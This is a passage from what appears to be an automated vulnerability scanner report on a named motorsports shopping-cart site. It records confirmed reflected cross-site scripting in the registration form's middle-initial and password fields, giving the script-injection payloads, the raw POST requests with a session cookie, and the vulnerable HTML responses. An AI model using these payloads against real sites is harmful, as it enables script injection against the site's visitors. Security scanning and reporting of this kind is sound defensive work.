&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST '"--></style></script><script>alert(0x000148)</script>
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000148)%3c%2fscript%3e&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:27:24 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="'"--></style></script><script>netsparker(0x000148)</script>"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST '"--></style></script><script>alert(0x000149)</script>
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000149)%3c%2fscript%3e&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:27:28 GMT
Content-Length: 12519
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x000149)</script>">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST '"--></style></script><script>alert(0x00014A)</script>
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00014A)%3c%2fscript%3e&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:28:15 GMT
Content-Length: 12519
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords do not match each other, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x00014A)</script>">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
